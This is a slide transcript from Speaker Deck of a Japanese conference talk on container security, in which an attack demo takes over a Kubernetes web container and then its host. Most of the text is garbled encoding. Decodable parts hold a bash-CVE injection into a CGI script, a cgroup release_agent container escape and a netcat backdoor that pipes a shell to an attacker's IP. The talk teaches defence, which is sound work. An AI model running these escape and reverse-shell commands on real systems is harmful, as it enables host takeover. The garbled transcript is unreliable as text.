Upgrade to Pro — share decks privately, control downloads, hide ads and more …

container-dev-security

mochizuki875
November 04, 2021

 container-dev-security

2021/11/04 CloudNative Days Tokyo 2021
17:20-18:00 Track F
乗っ取れコンテナ!!
〜開発者から見たコンテナセキュリティの考え方〜

セッション動画
https://event.cloudnativedays.jp/cndt2021/talks/1187

mochizuki875

November 04, 2021
Tweet

More Decks by mochizuki875

Other Decks in Technology

Transcript

  1. ϗετ04ͷϦεΫ ɾେ͖ͳΞλοΫαʔϑΣε ɾڞ༗Χʔωϧ ɾϗετ04ίϯ ポ ʔωϯτͷ੬ऑੑ ɾෆద੾ͳϢʔ ザ ΞΫηεݖ ɾϗετ04ϑΝΠϧγεςϜͷվ

    ざ Μ ΦʔέετϨʔλʔͷϦεΫ ɾ੍ݶͷͳ͍؅ཧऀΞΫηε ɾෆਖ਼ΞΫηε ɾίϯςφؒωοτϫʔΫτϥϑΟοΫͷෆे෼ͳ෼཭ ɾϫʔΫϩʔ ド ͷػඍੑϨ ベ ϧͷࠞ߹ ɾΦʔέετϨʔλϊʔ ド ͷ৴པ ϨδετϦͷϦεΫ ɾϨ ジ ετϦ΁ͷηΩϡΞ で ͳ͍઀ଓ ɾϨ ジ ετϦ಺ͷݹ͍Πϝʔ ジ  ɾೝূɾೝՄͷෆे෼ͳ੍ݶ ίϯςφͷϦεΫ ɾϥϯλΠϜιϑτ΢ΣΞ಺ͷ੬ऑੑ ɾίϯςφ͔Βͷແ੍ݶͷωοτϫʔΫΞΫηε ɾηΩϡΞ で ͳ͍ίϯςφϥϯλΠϜͷઃఆ ɾΞ プ Ϧͷ੬ऑੑ ɾະঝೝίϯςφ ΠϝʔδͷϦεΫ ɾΠϝʔ ジ ͷ੬ऑੑ ɾΠϝʔ ジ ͷઃఆͷෆඋ ɾຒΊࠐ·ΕͨϚϧ΢ΣΞ ɾຒΊࠐ·Εͨฏจͷൿີ৘ใ ɾ৴པ で ͖ͳ͍Πϝʔ ジ ͷ࢖༻ ίϯςφηΩϡϦςΟͷϓϥΫςΟεͷ୅දతྫͱͯ͠ɺ /*4541ΞϓϦέʔγϣϯίϯςφηΩϡϦςΟΨΠυ ͕͋Γ·͢ɻ ຊϓϥΫςΟεʹΑΔͱίϯςφηΩϡϦςΟͱͯ͠ѻ͏΂͖είʔϓ͸ҎԼͷΑ͏ʹఆٛ͞Ε͍ͯ·͢ɻ /*4541ΞϓϦέʔγϣϯίϯςφηΩϡϦςΟΨΠυʢ*1"೔ຊޠ຋༁൛ʣ IUUQTXXXJQBHPKQ fi MFTQEG ίϯςφηΩϡϦςΟͷશମ૾ͱείʔϓ
  2. ϗετ04ͷϦεΫ ɾେ͖ͳΞλοΫαʔϑΣε ɾڞ༗Χʔωϧ ɾϗετ04ίϯ ポ ʔωϯτͷ੬ऑੑ ɾෆద੾ͳϢʔ ザ ΞΫηεݖ ɾϗετ04ϑΝΠϧγεςϜͷվ

    ざ Μ ΦʔέετϨʔλʔͷϦεΫ ɾ੍ݶͷͳ͍؅ཧऀΞΫηε ɾෆਖ਼ΞΫηε ɾίϯςφؒωοτϫʔΫτϥϑΟοΫͷෆे෼ͳ෼཭ ɾϫʔΫϩʔ ド ͷػඍੑϨ ベ ϧͷࠞ߹ ɾΦʔέετϨʔλϊʔ ド ͷ৴པ ϨδετϦͷϦεΫ ɾϨ ジ ετϦ΁ͷηΩϡΞ で ͳ͍઀ଓ ɾϨ ジ ετϦ಺ͷݹ͍Πϝʔ ジ  ɾೝূɾೝՄͷෆे෼ͳ੍ݶ ίϯςφͷϦεΫ ɾϥϯλΠϜιϑτ΢ΣΞ಺ͷ੬ऑੑ ɾίϯςφ͔Βͷແ੍ݶͷωοτϫʔΫΞΫηε ɾηΩϡΞ で ͳ͍ίϯςφϥϯλΠϜͷઃఆ ɾΞ プ Ϧͷ੬ऑੑ ɾະঝೝίϯςφ ΠϝʔδͷϦεΫ ɾΠϝʔ ジ ͷ੬ऑੑ ɾΠϝʔ ジ ͷઃఆͷෆඋ ɾຒΊࠐ·ΕͨϚϧ΢ΣΞ ɾຒΊࠐ·Εͨฏจͷൿີ৘ใ ɾ৴པ で ͖ͳ͍Πϝʔ ジ ͷ࢖༻ ίϯςφηΩϡϦςΟͷશମ૾ͱείʔϓ ίϯςφηΩϡϦςΟͷϓϥΫςΟεͷ୅දతྫͱͯ͠ɺ /*4541ΞϓϦέʔγϣϯίϯςφηΩϡϦςΟΨΠυ ͕͋Γ·͢ɻ ຊϓϥΫςΟεʹΑΔͱίϯςφηΩϡϦςΟͱͯ͠ѻ͏΂͖είʔϓ͸ҎԼͷΑ͏ʹఆٛ͞Ε͍ͯ·͢ɻ /*4541ΞϓϦέʔγϣϯίϯςφηΩϡϦςΟΨΠυ IUUQTXXXJQBHPKQ fi MFTQEG งғؾ͸෼͔Δʂʂ ͕ɺ ۩ମతʹଊ͑ਏ͍ɾɾɾ ˞ݸਓͷݟղͰ͢
  3. 3FHJTUSZ $MPVE/8 )PTU04 0SDIFTUSBUPS $POUBJOFS3VOUJNF $POUBJOFS $POUBJOFS*NBHF "QQMJDBUJPO %FWFMPQFS "ENJOJTUSBUPS

    σϓϩΠ͢ΔίϯςφͷηΩϡϦςΟΛߟ͑Δ ίϯςφج൫ͷηΩϡϦςΟΛߟ͑Δ ɾͲͷΑ͏ͳίϯςφΛσϓϩΠ͢Δ͔ ɾίϯςφʹͲͷΑ͏ͳઃఆΛߦ͏͔ ɾج൫ΛͲͷΑ͏ʹ؅ཧ͢Δ͔ ɾج൫ʹͲͷΑ͏ͳઃఆΛߦ͏͔ ɾج൫ʹͲͷΑ͏ͳ੍ݶΛ͔͚Δ͔ ɾج൫ΛͲͷΑ͏ʹ؂ࢹ͢Δ͔ /*4541ΛϕʔεʹίϯςφηΩϡϦςΟͰѻ͏είʔϓΛ͞Βʹࡉ෼Խ͢Δͱɺ ҎԼͷΑ͏ʹ։ൃऀͱج൫؅ཧऀͦΕͧΕͰ୲͏΂͖ϨΠϠʹ෼͚Δ͜ͱ͕Ͱ͖·͢ɻ Ұൠతʹ͸͜ΕΒ֤ϨΠϠͦΕͧΕʹରͯ͠ηΩϡϦςΟରࡦΛߦ͏ଟ૚๷ޚͷߟ͑ํ͕ਪ঑͞Ε·͢ɻ ίϯςφηΩϡϦςΟͷશମ૾ͱείʔϓ
  4. 3FHJTUSZ $MPVE/8 )PTU04 0SDIFTUSBUPS $POUBJOFS3VOUJNF $POUBJOFS $POUBJOFS*NBHF "QQMJDBUJPO %FWFMPQFS "ENJOJTUSBUPS

    σϓϩΠ͢ΔίϯςφͷηΩϡϦςΟΛߟ͑Δ ίϯςφج൫ͷηΩϡϦςΟΛߟ͑Δ ɾͲͷΑ͏ͳίϯςφΛσϓϩΠ͢Δ͔ ɾίϯςφʹͲͷΑ͏ͳઃఆΛߦ͏͔ ɾج൫ΛͲͷΑ͏ʹ؅ཧ͢Δ͔ ɾج൫ʹͲͷΑ͏ͳઃఆΛߦ͏͔ ɾج൫ʹͲͷΑ͏ͳ੍ݶΛ͔͚Δ͔ ɾج൫ΛͲͷΑ͏ʹ؂ࢹ͢Δ͔ ຊηογϣϯͰ͸ͦͷதͰ΋։ൃऀͷ੹೚ϨΠϠʹؔ͢ΔηΩϡϦςΟϦεΫٴͼରࡦͷߟ͑ํΛ ۩ମతͳྫʹج͖ͮѻ͍͖͍ͬͯͨͱࢥ͍·͢ɻ ίϯςφηΩϡϦςΟͷશମ૾ͱείʔϓ ˞"QQMJDBUJPOʹ͍ͭͯ΋։ൃऀͷ੹೚ൣғͰ͸͋Γ·͕͢ɺࠓճͷझࢫͱ͸ҳΕΔͨΊ͜͜Ͱ͸είʔϓ͔Βআ֎͍ͯ͠·͢
  5. 3PMF -BZFS /*4541 ΠϝʔδͷϦεΫ ίϯςφͷϦεΫ ΦʔέετϨʔλͷϦεΫ ϗετ04ͷϦεΫ ϨδετϦͷϦεΫ %FWFMPQFS "QQMJDBUJPO

    Ξ プ Ϧͷ੬ऑੑ $POUBJOFS*NBHF Πϝʔδͷ੬ऑੑ Πϝʔδͷઃఆෆඋ  ຒΊࠐ·ΕͨϚϧ΢ΣΞ ຒΊࠐ·Εͨฏจͷൿີ৘ใ ৴པͰ͖ͳ͍Πϝʔδͷ࢖༻ $POUBJOFS Πϝʔδͷઃఆෆඋ ηΩϡΞ で ͳ͍ίϯςφϥϯλΠϜͷઃఆ ڞ༗Χʔωϧ  ϗετ04ϑΝΠϧγεςϜͷվ ざ Μ "ENJOJTUSBUPS $POUBJOFS3VOUJNF ϥϯλΠϜιϑτ΢ΣΞ಺ͷ੬ऑੑ 0SDIFTUSBUPS ίϯςφ͔Βͷແ੍ݶͷωοτϫʔΫΞΫηε ະঝೝίϯςφ ੍ݶͷͳ͍؅ཧऀΞΫηε ෆਖ਼ΞΫηε ίϯςφؒωοτϫʔΫτϥϑΟοΫͷෆे෼ͳ෼཭ ϫʔΫϩʔ ド ͷػඍੑϨ ベ ϧͷࠞ߹ ΦʔέετϨʔλϊʔ ド ͷ৴པ )PTU04 ڞ༗Χʔωϧ  ϗετ04ϑΝΠϧγεςϜͷվ ざ Μ  ϗετ04ίϯ ポ ʔωϯτͷ੬ऑੑ େ͖ͳΞλοΫαʔϑΣε  ෆద੾ͳϢʔ ザ ΞΫηεݖ $MPVE/8 େ͖ͳΞλοΫαʔϑΣε  ෆద੾ͳϢʔ ザ ΞΫηεݖ 3FHJTUSZ ϨδετϦ΁ͷηΩϡΞͰͳ͍઀ଓ ϨδετϦ಺ͷݹ͍Πϝʔδ ೝূɾೝՄͷෆे෼ͳ੍ݶ ʢࢀߟʣ֤ϨΠϠ΁ͷϚοϐϯά ίϯςφηΩϡϦςΟͷશମ૾ͱείʔϓ
  6. %FWFMPQFS ,VCFSOFUFT$MVTUFS 8PSLFS/PEF 8PSLFS/PEF .BOJGFTU $POUBJOFS *NBHF 4FSWJDF" 4FSWJDF# 4FSWJDF$

    LVCFDUMBQQMZ .BTUFS/PEF 8FCαΠτΛ ίϯςφͱͯ͠σϓϩΠ ͋ΔνʔϜͰ͸,VCFSOFUFTΛίϯςφج൫ͱͯ͠ར༻͓ͯ͠Γɺ ΞϓϦ։ൃऀ͸༷ʑͳαʔϏεΛίϯςφʢ1PEʣͱͯ͠σϓϩΠ͍ͯ͠·͢ɻ ͋Δ࣌ɺ৽ͨʹ8FCαʔϏεΛϢʔβʔʹఏڙ͠Α͏ͱίϯςφΛσϓϩΠ͠·ͨ͠ɻ ˞ࠓճͷέʔεͰ͸8FCαʔϏεσϓϩΠʹ༻͍ΔίϯςφΠϝʔδɺ,VCFSOFUFT.BOJGFTUʢίϯςφىಈઃఆʣ ɹʹηΩϡϦςΟϦεΫΛؚΜͰ͓Γɺ߈ܸऀ͸ͦΕΒΛར༻ͯ͠߈ܸΛ࢓ֻ͚·͢ ηΩϡϦςΟϦεΫΛؚΉ ίϯςφ΁ͷ߈ܸࣄྫ֓ཁ
  7. %FWFMPQFS ,VCFSOFUFT$MVTUFS 8PSLFS/PEF 8PSLFS/PEF 4FSWJDF" 4FSWJDF# 4FSWJDF$ 8FC LVCFDUMHFUQPE /".&3&"%:45"5643&45"354"(&

    XFC3VOOJOHN TFSWJDF@B3VOOJOHIN TFSWJDF@C3VOOJOHIN TFSWJDF@D3VOOJOHIN .BTUFS/PEF ίϯςφ΁ͷ߈ܸࣄྫ֓ཁ ͋ΔνʔϜͰ͸,VCFSOFUFTΛίϯςφج൫ͱͯ͠ར༻͓ͯ͠Γɺ ΞϓϦ։ൃऀ͸༷ʑͳαʔϏεΛίϯςφʢ1PEʣͱͯ͠σϓϩΠ͍ͯ͠·͢ɻ ͋Δ࣌ɺ৽ͨʹ8FCαʔϏεΛϢʔβʔʹఏڙ͠Α͏ͱίϯςφΛσϓϩΠ͠·ͨ͠ɻ ˞ࠓճͷέʔεͰ͸8FCαʔϏεσϓϩΠʹ༻͍ΔίϯςφΠϝʔδɺ,VCFSOFUFT.BOJGFTUʢίϯςφىಈઃఆʣ ɹʹηΩϡϦςΟϦεΫΛؚΜͰ͓Γɺ߈ܸऀ͸ͦΕΒΛར༻ͯ͠߈ܸΛ࢓ֻ͚·͢
  8. 6TFS ,VCFSOFUFT$MVTUFS 8PSLFS/PEF 8PSLFS/PEF 4FSWJDF" 4FSWJDF# 4FSWJDF$ 8FC /8 .BTUFS/PEF

    8FCαΠτʹΞΫηε Ϣʔβʔ͸৽ͨʹެ։͞Εͨ8FCαʔϏεʹΞΫηε͠ɺαʔϏεΛར༻͠·͢ɻ ίϯςφ΁ͷ߈ܸࣄྫ֓ཁ
  9. "UUBDLFS ,VCFSOFUFT$MVTUFS 8PSLFS/PEF 8PSLFS/PEF 4FSWJDF" 4FSWJDF# 4FSWJDF$ 8FC /8 .BTUFS/PEF

    ѱҙͷ͋ΔϢʔβʔʢ߈ܸऀʣ͕8FCαʔϏεͷηΩϡϦςΟϦεΫΛൃݟ͠ɺ߈ܸΛ࢓ֻ͚Α͏ͱࢼΈ·͢ɻ ͳ͓ɺࠓճͷྫͰ߈ܸऀ͸ҰൠϢʔβʔͱಉ͘͡Πϯλʔωοτӽ͠ʹαʔϏεʹΞΫηε͢Δ΋ͷͱ͠·͢ɻ ˞ຊདྷ߈ܸΛ࢓ֻ͚Δࡍ͸߈ܸऀ͕ͲͷΑ͏ʹηΩϡϦςΟϦεΫΛൃݟ͢Δ͔ɺͲͷΑ͏ʹ߈ܸର৅ͷߏ੒Λ஌Δ͔ɺ ɹͱ͍ͬͨ؍఺΋ߟྀ͢Δඞཁ͕͋Γ·͕͢ɺࠓճͷझࢫͱ͸࿩͕ҳΕΔͨΊলུ͍͖ͤͯͨͩ͞·͢ɻ "UUBDL ίϯςφ΁ͷ߈ܸࣄྫ֓ཁ
  10. "UUBDLFS $POUBJOFS)PTUʢ8PSLFS/PEFʣ 4FSWJDF" 8FC ࠓճͷγφϦΦͰ͸߈ܸऀ͸ҎԼͷͭͷ߈ܸΛࢼΈ·͢ɻ ɹ<γφϦΦᶃ>ίϯςφΛ৐ͬऔΔ ɹɹ8FCαʔϏεʹෆਖ਼ͳϦΫΤετΛૹΓ͚ͭΔ͜ͱͰίϯςφʹόοΫυΞΛ࢓ֻ͚ͯ৵ೖ͢Δɻ ɹɹͦͷޙɺ8FCαΠτͷϦϯΫΛॻ͖׵͑Δɻ ɹ<γφϦΦᶄ>ίϯςφϗετΛ৐ͬऔΔ ɹɹ৵ೖͨ͠ίϯςφ͔Βίϯςφϗετʹରͯ͠ෆਖ਼ͳίϚϯυΛൃߦ͢Δɻ

    ɹɹίϚϯυ࣮ߦʹΑΓόοΫυΞΛ࢓ֻ͚Δ͜ͱͰίϯςφϗετʹ৵ೖ͢Δɻ ᶃίϯςφ಺ʹ৵ೖ ᶃ8FCαΠτΛॻ͖׵͑ DNE ᶄίϯςφϗετʹରͯ͠ෆਖ਼ͳίϚϯυΛ࣮ߦ #BDL%PPS ᶄόοΫυΞΛ࡞੒ ᶄόοΫυΞΛܦ༝ͯ͠৵ೖ ίϯςφ΁ͷ߈ܸࣄྫ֓ཁ ˞։ൃऀ͕ηΩϡϦςΟϦεΫΛؚΉίϯςφΛσϓϩΠ͍ͯ͠ΔέʔεΛ૝ఆͨ͠߈ܸσϞΛ໨తͱ ɹ͍ͯ͠ΔͨΊɺҙਤతʹ੬ऑͳ؀ڥΛ࡞੒͍ͯ͠·͢ ɹ·ͨɺίϯςφϨΠϠͷϦεΫΛදݱ͢ΔͨΊɺ͋͑ͯج൫؅ཧϨΠϠ΁ͷηΩϡϦςΟରࡦ͸ ɹߦ͍ͬͯ·ͤΜ
  11. "UUBDLFS $POUBJOFS)PTUʢ8PSLFS/PEFʣ ߈ܸऀͷλʔϛφϧͰίϯςφʹ৵ೖͰ͖ͨʢίϯςφ಺ͷTIFMMΛऔಘͰ͖ͨʣ͜ͱ͕֬ೝͰ͖·͢ɻ ͜ΕʹΑΓ߈ܸऀ͸ίϯςφ಺Ͱ೚ҙͷૢ࡞͕ՄೳʹͳΓ·ͨ͠ɻ ίϯςφ಺ʹ৵ೖ ODOWMQ -JTUFOJOHPO $POOFDUJPOSFDFJWFEPO JE VJE

    XXXEBUB HJE XXXEBUB HSPVQT XXXEBUB  XIFFM  IPTUOBNF XFC 8FC ίϯςφʢ߈ܸऀ୺຤ͷλʔϛφϧ͔Β৵ೖʣ ߈ܸऀ͸ίϯςφ಺Ͱ ೚ҙͷίϚϯυΛ࣮ߦ Մೳʹͳͬͨ ϙʔτ଴ͪड͚ ίϯςφͱηογϣϯཱ֬ ίϯςφ΁ͷ߈ܸࣄྫᶃίϯςφΛ৐ͬऔΔ
  12. "UUBDLFS $POUBJOFS)PTUʢ8PSLFS/PEFʣ ઌ΄Ͳίϯςφ಺Ͱ࡞੒ͨ͠ϑΝΠϧDNEͷ࣮ଶ͸ɺϗετ্ͷSPPUGTʹॴଐ͢ΔಛఆσΟϨΫτϦʹଘࡏ͢Δ͜ͱʹͳΓ·͢ɻ ͜Ε͸ίϯςφͷSPPUGT͕ϗετ্ͷ0WFSMBZ'4͔ΒϚ΢ϯτ͞Ε͍ͯΔͨΊͰ͢ɻ 0WFSMBZ'4͸ෳ਺ͷσΟϨΫτϦΛॏͶ߹ΘͤͯͭͷϑΝΠϧγεςϜΛ࠶ݱ͢Δ࢓૊ΈͰ͋Γɺ 0WFSMBZ'4ʹର͢Δߋ৽͸6QQFSEJSʹ൓ө͞Ε·͢ɻ NPVOUUPWFSMBZ PWFSMBZPOUZQFPWFSMBZ SX SFMBUJNF

    MPXFSEJSWBSMJCDPOUBJOFSEJPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUTGTWBSMJC DPOUBJOFSEJPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUTGTWBSMJCDPOUBJOFSEJPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGT TOBQTIPUTGTWBSMJCDPOUBJOFSEJPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUTGTWBSMJCDPOUBJOFSE JPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUTGTWBSMJCDPOUBJOFSEJPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUT GTWBSMJCDPOUBJOFSEJPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUTGTWBSMJCDPOUBJOFSE JPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUTGTWBSMJCDPOUBJOFSEJPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUT GT VQQFSEJSWBSMJCDPOUBJOFSEJPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUTGT XPSLEJSWBSMJCDPOUBJOFSE JPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUTXPSL YJOPP ff 8FC ίϯςφʢ߈ܸऀ୺຤ͷλʔϛφϧ͔Β৵ೖʣ TZTGTDHSPVQSENB Y OPUJGZ@PO@SFMFBTF DNE 0WFSMBZGT 6QQFSEJS -PXFSEJS -BZFS -PXFSEJS -BZFS XPSL DNE ࣮ମ͸ϗετ্ͷ 0WFSMBZGTʹଘࡏ ˞Ϛ΢ϯτ͞Ε͍ͯΔ0WFSMBZGTͷϗετ্Ͱͷύε͸ɺίϯςφ಺ͰNPVOUίϚϯυΛ࣮ߦ͢Δ͜ͱͰ֬ೝՄೳͰ͢ɻ ίϯςφ΁ͷ߈ܸࣄྫᶄίϯςφϗετΛ৐ͬऔΔ
  13. "UUBDLFS $POUBJOFS)PTUʢ8PSLFS/PEFʣ DHSPVQ͕ίϯςφͱϗετͰڞ௨Ͱ͋Δ͜ͱΛར༻͢ΔͱɺҎԼͷΑ͏ͳίϚϯυૢ࡞Λߦ͏͜ͱͰઌ΄Ͳ༻ҙͨ͠ ϓϩάϥϜΛDHSPVQͷػೳΛ༻͍ͯൃՐͤ͞ɺϗετ্Ͱ࣮ߦͰ͖ΔΑ͏ʹͳΓ·͢ɻ <ิ଍> ɹDHSPVQͱ͸Χʔωϧ্ͷϓϩηεʹରͯ͠Ϧιʔεͷ੍ݶΛߦ͏࢓૊ΈͰ͋Γɺ͜͜Ͱ͸DHSPVQWͷ΋ͭSFMFBTFBHFOUͱ͍͏ػೳΛར༻͍ͯ͠·͢ɻ ɹSFMFBTFBHFOUΛ༗ޮʢᶃʣʹ্ͨ͠ͰઃఆϑΝΠϧʹϓϩάϥϜΛొ࿥ʢᶄʣ͓ͯ͘͜͠ͱͰɺಛఆͷDHSPVQʹॴଐ͢Δϓϩηε͕શͯऴྃʢᶅʣͨ͜͠ͱΛܖػʹ ɹͦͷϓϩάϥϜΛ࣮ߦ͢Δ͜ͱ͕Ͱ͖·͢ɻ 8FC TZTGTDHSPVQSENB

    Y OPUJGZ@PO@SFMFBTF ίϚϯυ࣮ߦ TI 0WFSMBZGT 6QQFSEJS -PXFSEJS -BZFS -PXFSEJS -BZFS XPSL DNE SFMFBTF@BHFOU ొ࿥͞ΕͨϓϩάϥϜΛൃՐ DHSPVQQSPDT QSPDFTT ίϚϯυ࣮ߦ࣌ʹ1*%͕ొ࿥͞Ε ׬ྃʹ൐͍࡟আ͞ΕΔ ˞Yʹॴଐ͢Δϓϩηε͕શͯऴྃͨ͠ͱΈͳ͞ΕΔ ϗετ্Ͱ࣮ߦ FDIPTZTGTDHSPVQSENBYOPUJGZ@PO@SFMFBTF FDIPWBSMJCDPOUBJOFSEJPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUTGTDNETZTGTDHSPVQSENBSFMFBTF@BHFOU TIDFDIPaaTZTGTDHSPVQSENBYDHSPVQQSPDT ίϯςφʢ߈ܸऀ୺຤ͷλʔϛφϧ͔Β৵ೖʣ ɾɾɾᶃ ɾɾɾᶄ ɾɾɾᶅ ϗετ্ͰͷDNEͷύε ίϯςφ΁ͷ߈ܸࣄྫᶄίϯςφϗετΛ৐ͬऔΔ
  14. ίϯςφ಺͔Βϗετ্Ͱ೚ҙͷίϚϯυΛ࣮ߦͰ͖Δ͜ͱΛར༻͠ɺϗετʹόοΫυΞΛ࢓ֻ͚ͯ৵ೖ͢Δ͜ͱΛࢼΈ·͢ɻ ·ͣ͸ϗετͷ*1ΞυϨεΛऔಘ͠·͢ɻ ίϯςφʢ߈ܸऀ୺຤ͷλʔϛφϧ͔Β৵ೖʣ DBU&0'DNE CJOTI JQBWBSMJCDPOUBJOFSEJPDPOUBJOFSETOBQTIPUUFSWPWFSMBZGTTOBQTIPUTGTJQUYU &0' ϗετ͔ΒݟͨίϯςφͷSPPUGTͷύε TIDFDIPaaTZTGTDHSPVQSENBYDHSPVQQSPDT DBUJQUYU

    ʢུʣ FOT#30"%$"45 .6-5*$"45 61 -08&3@61NUVREJTDNRTUBUF61HSPVQEFGBVMURMFO MJOLFUIFSDEDDCSE ff  ff  ff  ff  ff  ff  JOFUCSETDPQFHMPCBMFOT ʢུʣ ϓϩάϥϜͷ࡞੒ ϓϩάϥϜͷ࣮ߦ ϓϩάϥϜͷ࣮ߦ݁Ռͷ֬ೝ ίϯςφ΁ͷ߈ܸࣄྫᶄίϯςφϗετΛ৐ͬऔΔ
  15. ҎԼͷΑ͏ͳίϚϯυΛͦΕͧΕ߈ܸऀ୺຤ٴͼίϯςφ಺࣮ͯߦ͢Δ͜ͱͰϗετʹରͯ͠όοΫυΞΛ࢓ֻ͚ɺ ߈ܸऀ୺຤͔Βϗετʹ৵ೖ͢Δ͜ͱ͕Ͱ͖·͢ɻ ίϯςφʢ߈ܸऀ୺຤ͷλʔϛφϧ͔Β৵ೖʣ DBU&0'DNE CJOTI ODMcCBTIcOD߈ܸ୺຤*1 &0' TIDFDIPaaTZTGTDHSPVQSENBYDHSPVQQSPDT ODM ߈ܸऀ୺຤ʢλʔϛφϧʣ

    OD ߈ܸऀ୺຤ʢλʔϛφϧʣ "UUBDLFS $POUBJOFS)PTUʢ8PSLFS/PEFʣ 8FC DNE ϙʔτ଴ͪड͚ #BDL%PPS ʢϙʔτ଴ͪड͚ʣ ϙʔτѼ௨৴ όοΫυΞΛ࡞੒ ίϯςφ΁ͷ߈ܸࣄྫᶄίϯςφϗετΛ৐ͬऔΔ ઌ΄Ͳऔಘͨ͠ϗετͷ*1ΞυϨε
  16. ߈ܸऀ୺຤ʹ͓͍ͯɺλʔϛφϧͰίϚϯυΛൃߦ͢Δͱͦͷ࣮ߦ݁Ռ͕λʔϛφϧʹදࣔ͞ΕΔΑ͏ʹͳΓ·ͨ͠ɻ ͜ΕͰ߈ܸऀ͸ࣗ਎ͷ୺຤͔Βίϯςφϗετʹରͯ͠೚ҙͷίϚϯυΛൃߦͰ͖ΔΑ͏ʹͳΓ·ͨ͠ɻ ʢίϯςφϗετΛ৐ͬऔΔ͜ͱ͕Ͱ͖ͨʣ ODM VJE SPPU HJE SPPU HSPVQT SPPU

     LTDMVTUFSXPSLFS $0/5"*/&3*%*."(&$3&"5&%45"5&/".&"55&.1510%*% GFEBCFEDFCNJOVUFTBHP3VOOJOHXFCFCDCF GFEEFDFDFCIPVSTBHP3VOOJOHTFSWJDF@BGEECF GFBFEFCCBECEEBZTBHP3VOOJOHLVCFQSPYZDEDBC BDGFEGCEEBZTBHP3VOOJOHDPSFEOTCEDF ߈ܸऀ୺຤ʢλʔϛφϧʣ OD JE IPTUOBNF DSJDUMQT "UUBDLFS $POUBJOFS)PTUʢ8PSLFS/PEFʣ 8FC ߈ܸऀ͸όοΫυΞΛܦ༝ͯ͠೚ҙͷ ίϚϯυΛ࣮ߦͰ͖ΔΑ͏ʹͳͬͨ ϙʔτ଴ͪड͚ #BDL%PPS ʢϙʔτ଴ͪड͚ʣ ϙʔτѼ௨৴ JE IPTUOBNF DSJDUM ߈ܸऀ୺຤ʢλʔϛφϧʣ ίϯςφ΁ͷ߈ܸࣄྫᶄίϯςφϗετΛ৐ͬऔΔ
  17. $POUBJOFS)PTU QSPDFTT $POUBJOFS" *NBHF" $POUBJOFS)PTU QSPDFTT $POUBJOFS# *NBHF# ඞཁ࠷খݶͷϥΠϒϥϦ΍ ύοέʔδɺόΠφϦɺ

    ઃఆ஋ΛؚΊͨΠϝʔδ ඞཁҎ্ͷϥΠϒϥϦ΍ ύοέʔδɺόΠφϦɺ ઃఆ஋ΛؚΊͨΠϝʔδ ίϯςφͷִ཭؀ڥʹ͸ඞཁ࠷খݶͷ΋ͷؚ͕·ΕΔঢ়ଶ ίϯςφͷִ཭؀ڥʹ༷ʑͳ΋ͷؚ͕·ΕΔঢ়ଶ ɹʻʻɹηΩϡϦςΟϦεΫɹʻʻɹ Πϝʔδʹ༨෼ͳ΋ͷΛؚΊͳ͍ ίϯςφηΩϡϦςΟͷߟ͑ํΠϝʔδ جຊ ݪଇ খ େ
  18. ࠓճ߈ܸ͕੒ཱͯ͠͠·ͬͨέʔεʹ͓͍ͯɺ։ൃऀ͕༻ҙͨ͠Πϝʔδʢ%PDLFS fi MFʣ͕Ͳ͏͔ͩͬͨݟͯΈ·͠ΐ͏ɻ Ұݟ%PDLFS fi MF಺Ͱߦ͍ͬͯΔ͜ͱʹ໰୊͸ͳͦ͞͏Ͱ͢ɻ ͔͠͠ͳ͕Β࢖༻͍ͯ͠ΔϕʔεΠϝʔδ͸ຊ౰ʹ৴པͰ͖Δ΋ͷͳͷͰ͠ΐ͏͔ɻ '30.NPDIJ[VLJDWFBQBDIFEFCJBOCVTUFS 1MBDFDPOUFOU $01:JOEFYIUNMWBSXXXIUNM

    36/DIPXOXXXEBUBXXXEBUBWBSXXXIUNMJOEFYIUNM ։ൃऀ͕༻ҙͨ͠%PDLFS fi MF ʢNPDIJ[VLJUSBJOJOHXFCTJUFQPDWʣ ˞ࠓճ͸͋͘·ͰྫͳͷͰ͔͋Β͞·ʹո͍͠ϕʔεΠϝʔδ໊ʹͳ͍ͬͯ·͕͢ɺ ɹ࣮ࡍͷέʔεͰ͸։ൃऀ͕Կͱͳ͘બఆͨ͠ΠϝʔδΛ૝ఆ͍ͯͩ͘͠͞ ɹʢྫ͑͹։ൃऀ͕%PDLFS)VCͰQFSGPSNBODFMBCIJHIQFSGPSNBODFIUUQEWͷΑ͏ͳ΋ͷΛݟ͚ͭͯ࢖༻ʣ ίϯςφηΩϡϦςΟͷߟ͑ํΠϝʔδ ϦεΫ
  19. ։ൃऀ͕࢖༻ͨ͠ϕʔεΠϝʔδͷத਎͸ҎԼͷΑ͏ʹͳ͓ͬͯΓɺ ຊདྷؚΊΔ΂͖Ͱͳ͍༷ʑͳ༨෼ͳ΋ͷؚ͕·Ε͍ͯΔঢ়ଶͰͨ͠ɻ '30.EFCJBOCVTUFS *OTUBMMQBDLBHFTBOEQFSNJTTJPOTFUUJOH 36/BQUHFUVQEBUFa BQUHFUVQHSBEFZa %&#*"/@'30/5&/%OPOJOUFSBDUJWFBQUHFUJOTUBMMZBQBDIFa BFONPEDHJEa BQUHFUZJOTUBMMMJCUJOGPa BQUHFUZJOTUBMMOFUDBUa

    BQUHFUJOTUBMMZTVEPa HSPVQBEEXIFFMa VTFSNPEB(XIFFMXXXEBUBa FDIPXIFFM"--/01"448%"--FUDTVEPFSTa BQUHFUDMFBOa SNSGWBSMJCBQUMJTUT  *OKFDU$7&CBTI $01:QBDLBHFTQBDLBHFT 36/EQLHJQBDLBHFT  1MBDFDPOUFOU $01:WVMOFSBCMFVTSMJCDHJCJO $01:EBOHFSIUNMWBSXXXIUNM 36/DIPXOXXXEBUBXXXEBUBWBSXXXIUNM a DIPXOXXXEBUBXXXEBUBVTSMJCDHJCJOWVMOFSBCMFa DINPE YVTSMJCDHJCJOWVMOFSBCMF &9104& 